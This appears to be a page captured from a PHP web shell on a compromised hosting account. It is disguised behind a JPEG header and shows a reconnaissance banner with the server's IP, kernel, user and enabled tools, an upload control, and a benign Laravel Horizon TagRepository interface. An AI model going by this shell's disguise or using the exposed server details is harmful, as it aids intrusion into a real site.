����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 216.73.216.168 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/laravel/horizon/src/Contracts/ |
Upload File : |
<?php namespace Laravel\Horizon\Contracts; interface TagRepository { /** * Get the currently monitored tags. * * @return array */ public function monitoring(); /** * Return the tags which are being monitored. * * @param array $tags * @return array */ public function monitored(array $tags); /** * Start monitoring the given tag. * * @param string $tag * @return void */ public function monitor($tag); /** * Stop monitoring the given tag. * * @param string $tag * @return void */ public function stopMonitoring($tag); /** * Store the tags for the given job. * * @param string $id * @param array $tags * @return void */ public function add($id, array $tags); /** * Store the tags for the given job temporarily. * * @param int $minutes * @param string $id * @param array $tags * @return void */ public function addTemporary($minutes, $id, array $tags); /** * Get the number of jobs matching a given tag. * * @param string $tag * @return int */ public function count($tag); /** * Get all of the job IDs for a given tag. * * @param string $tag * @return array */ public function jobs($tag); /** * Paginate the job IDs for a given tag. * * @param string $tag * @param int $startingAt * @param int $limit * @return array */ public function paginate($tag, $startingAt = 0, $limit = 25); /** * Delete the given tag from storage. * * @param string $tag * @return void */ public function forget($tag); }